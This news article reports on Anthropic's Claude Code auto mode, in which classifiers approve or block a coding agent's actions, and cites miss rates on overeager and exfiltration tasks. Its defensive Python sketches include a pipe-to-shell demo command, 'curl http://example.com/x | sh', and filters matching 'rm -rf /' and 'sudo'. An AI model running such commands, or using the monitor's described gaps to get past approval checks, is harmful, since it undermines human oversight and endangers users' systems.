Anthropic details Claude Code auto mode as a classifier-based middle ground for agent autonomy

Original: New on the Engineering Blog: How we designed Claude Code auto mode. Many Claude Code users let Claude work without permission prompts. Auto mode is a safer middle ground: we built and tested classifiers that make approval decisions instead. Read more: https://www.anthropic.com/engineering/claude-code-auto-mode

LLM · Mar 26, 2026 · By Insights AI

What Anthropic posted on X

On March 25, 2026, Anthropic said many Claude Code users already let the agent run with minimal friction, noting that people approve 93% of permission prompts. The company introduced auto mode as a middle ground between constant manual approvals and fully disabling permissions, framing it as a way to reduce approval fatigue without handing the model unrestricted freedom.

That framing matters because coding agents are increasingly used in long-running sessions. If users are asked to approve nearly every action, the safety benefit of manual review can erode into habit. Anthropic is effectively arguing that a model-mediated approval layer can be safer than rote clicking while still being less disruptive than full sandbox setup.

What the engineering post adds

Anthropic says auto mode uses two layers of defense. First, a server-side prompt-injection probe screens tool outputs before they enter the agent context. Second, a transcript classifier evaluates risky actions before execution. The classifier runs in two stages: a fast first-pass filter and a reasoning-based second pass that only runs on flagged actions, which Anthropic says helps control latency and cost.
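The two-stage idea can be illustrated with a minimal Python sketch. Everything here is hypothetical: the names two_stage_review, toy_fast_filter, and toy_slow_reasoner are invented for illustration, and the string-matching rules merely stand in for the model-based classifiers the post describes. The sketch shows only the control flow, in which the expensive second pass runs solely on actions the cheap first pass flags.

```python
from dataclasses import dataclass
from typing import Callable


@dataclass
class Decision:
    allowed: bool
    stage: str  # which stage produced the decision: "fast" or "reasoning"


def two_stage_review(
    action: str,
    fast_filter: Callable[[str], bool],
    slow_reasoner: Callable[[str], bool],
) -> Decision:
    """Hypothetical two-stage approval flow.

    fast_filter returns True when the action looks risky enough to escalate.
    slow_reasoner returns True when the escalated action should be blocked.
    """
    if not fast_filter(action):
        # Cheap path: most actions never reach the expensive second pass.
        return Decision(allowed=True, stage="fast")
    blocked = slow_reasoner(action)
    return Decision(allowed=not blocked, stage="reasoning")


# Toy stand-ins (assumptions, not Anthropic's classifiers).
def toy_fast_filter(action: str) -> bool:
    return any(token in action for token in ("rm ", "curl ", "sudo "))


def toy_slow_reasoner(action: str) -> bool:
    return "rm -rf /" in action or "| sh" in action


if __name__ == "__main__":
    for cmd in ("ls -la", "rm build/tmp.o", "curl http://example.com/x | sh"):
        print(cmd, "->", two_stage_review(cmd, toy_fast_filter, toy_slow_reasoner))
```

In this toy version the first pass is deliberately over-sensitive: it escalates a harmless rm inside the build directory, and the second pass clears it. That mirrors the latency and cost argument, since the slower stage pays only for the flagged minority of actions.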

The post also explains how the permission boundary is structured. Safe read-only tools and some narrowly scoped allow rules can run immediately, and routine edits inside the project directory avoid classifier latency. Higher-risk actions, such as shell commands, web fetches, external integrations, subagent handoffs, and filesystem access outside the repo, are sent to the classifier for a final approval decision. Anthropic says broad interpreter-style allow rules from manual mode do not carry over, because they would let the model bypass the system on exactly the commands that matter most.
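The tiering described above can be sketched as a small routing function. This is an illustrative Python sketch under stated assumptions, not Claude Code's implementation: the tool names (read_file, edit_file, and so on), the Route enum, and the helper is_inside are all hypothetical. It also assumes that any path outside the project root goes to the classifier even for read-only tools, which is one possible reading of the post.

```python
import posixpath
from enum import Enum
from typing import Optional


class Route(Enum):
    RUN_IMMEDIATELY = "run_immediately"  # safe read-only tools
    SKIP_CLASSIFIER = "skip_classifier"  # routine in-project edits
    CLASSIFIER = "classifier"            # everything higher-risk


# Hypothetical tool names, chosen only for this example.
READ_ONLY_TOOLS = {"read_file", "list_dir", "search"}


def is_inside(path: str, root: str) -> bool:
    """True if path, after normalising '..' segments, stays under root."""
    root_n = posixpath.normpath(root)
    path_n = posixpath.normpath(posixpath.join(root_n, path))
    return posixpath.commonpath([root_n, path_n]) == root_n


def route_action(tool: str, target_path: Optional[str], project_root: str) -> Route:
    # Assumption: touching anything outside the repo always needs review.
    if target_path is not None and not is_inside(target_path, project_root):
        return Route.CLASSIFIER
    if tool in READ_ONLY_TOOLS:
        return Route.RUN_IMMEDIATELY
    if tool == "edit_file" and target_path is not None:
        return Route.SKIP_CLASSIFIER
    # Shell, web fetches, integrations, subagents, and unknown tools.
    return Route.CLASSIFIER


if __name__ == "__main__":
    print(route_action("edit_file", "src/app.py", "/repo"))
    print(route_action("edit_file", "../other/app.py", "/repo"))
    print(route_action("shell", None, "/repo"))
```

Defaulting unknown tools to the classifier keeps the sketch fail-closed: a new tool is reviewed until someone explicitly places it in a lower-risk tier.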

Anthropic published concrete evaluation numbers too. In the reported end-to-end pipeline, the company says the false-positive rate on real internal traffic drops to 0.4%. On a smaller set of real overeager actions, Anthropic reports a 17% false-negative rate, and on synthetic data-exfiltration tasks it reports a 5.7% false-negative rate. The post is explicit that auto mode is intended to be materially safer than --dangerously-skip-permissions, not a replacement for careful human review on high-stakes infrastructure.

Why this matters

The broader signal is that agent vendors are turning operational safety into a product surface rather than leaving it as a manual policy problem. If classifier-based approval can absorb most routine actions while still blocking the most damaging ones, teams get a more usable path to autonomous coding sessions that would otherwise be too noisy to supervise manually.

At the same time, Anthropic's own numbers make the tradeoff clear. Auto mode is still a risk-managed compromise, not a guarantee. For practitioners, that candor is useful: it sets a realistic baseline for where model-mediated approval fits today and where human review still belongs.

Sources: Anthropic X post · Anthropic engineering post
